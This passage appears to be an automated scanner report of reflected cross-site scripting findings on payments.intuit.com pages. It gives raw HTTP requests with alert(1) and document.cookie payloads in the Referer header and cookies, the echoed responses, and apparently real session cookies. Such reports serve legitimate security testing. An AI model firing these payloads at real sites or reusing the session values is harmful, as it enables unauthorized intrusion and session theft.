Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 89bfc--><script>alert(1)</script>439a0271950 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=89bfc--><script>alert(1)</script>439a0271950
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13123'-alert(1)-'be5801a90fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed that use client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload d754d--><script>alert(1)</script>cf0ed983ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d754d--><script>alert(1)</script>cf0ed983ea
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac0d6'-alert(1)-'c1f71db423d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 3c927--><script>alert(1)</script>c31793869de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=3c927--><script>alert(1)</script>c31793869de
The value of the Referer HTTP header is copied into an HTML comment. The payload 88c20--><script>alert(1)</script>924f3a86d14 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=88c20--><script>alert(1)</script>924f3a86d14
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8442e'-alert(1)-'9e35c41500 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/echecks-and-check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=8442e'-alert(1)-'9e35c41500';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 13789--><script>alert(1)</script>c6658a6c597 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13789--><script>alert(1)</script>c6658a6c597
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51516'-alert(1)-'1ab853b004d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/internet-merchant-accounts.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=51516'-alert(1)-'1ab853b004d';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 189b5'-alert(1)-'d3b08e9e2f1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1
Response
...[SNIP]...
// This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
var testReferDomain="0";
var eVar17Value = 'http://www.google.com/search?hl=en&q=189b5'-alert(1)-'d3b08e9e2f1';
</script>
...[SNIP]...
The value of the Referer HTTP header is copied into an HTML comment. The payload 18139--><script>alert(1)</script>e22e5c6761f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, client-side technologies such as Flash have provided ways to make another user's browser send a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /products/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=18139--><script>alert(1)</script>e22e5c6761f
The value of the Referer HTTP header is copied into an HTML comment. The payload f7c47--><script>alert(1)</script>3f78b487239 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
